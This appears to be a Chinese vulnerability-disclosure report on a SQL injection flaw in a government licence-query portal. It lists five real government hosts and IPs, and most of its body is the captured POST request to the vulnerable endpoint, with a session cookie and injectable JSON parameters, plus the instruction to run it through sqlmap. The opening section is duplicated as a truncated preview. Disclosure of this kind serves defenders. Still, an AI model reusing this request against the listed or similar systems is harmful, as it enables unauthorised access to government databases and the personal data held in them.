### 简要描述: rt ### 详细说明: 某政府在用系统通用型SQL注入#3。 案例如下: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp http://117.40.187.175:8008/outportal/licenseManage/licenseManage.jsp http://xzfw.jinxi.gov.cn/outportal/licenseManage/licenseManage.jsp http://xzfw.jxcr.gov.cn/outportal/licenseManage/licenseManage.jsp http://120.203.196.20/outportal/licenseManage/licenseManage.jsp ### 漏洞证明: 需要一个一个的抓包。 http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp POST参数: POST/outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer:http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp x-requested-with: XMLHttpRequest Content-Type: application/json Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host:...
### 简要描述: rt ### 详细说明: 某政府在用系统通用型SQL注入#3。 案例如下: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp http://117.40.187.175:8008/outportal/licenseManage/licenseManage.jsp http://xzfw.jinxi.gov.cn/outportal/licenseManage/licenseManage.jsp http://xzfw.jxcr.gov.cn/outportal/licenseManage/licenseManage.jsp http://120.203.196.20/outportal/licenseManage/licenseManage.jsp ### 漏洞证明: 需要一个一个的抓包。 http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp POST参数: POST/outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer:http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp x-requested-with: XMLHttpRequest Content-Type: application/json Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: wssp.jiangxi.gov.cn:8008 Content-Length: 108 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=EE31BE605CD71740C767AF5FA575E5D6 {"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"acceptno":"1","cerno":"1"},"length":2}} 用sqlmap -r 去跑。 [<img src="https://images.seebug.org/upload/201505/192030466ed35e27170a57b752c4a441fc398bfb.png" alt="021553305104c61cce41f73df23babce9ee628b4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/192030466ed35e27170a57b752c4a441fc398bfb.png) [<img src="https://images.seebug.org/upload/201505/1920305303b8fdf4f4bec380cf064063d7e79eb2.png" alt="0215534880d275746dc39d36faf798203acc1f4b.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/1920305303b8fdf4f4bec380cf064063d7e79eb2.png)
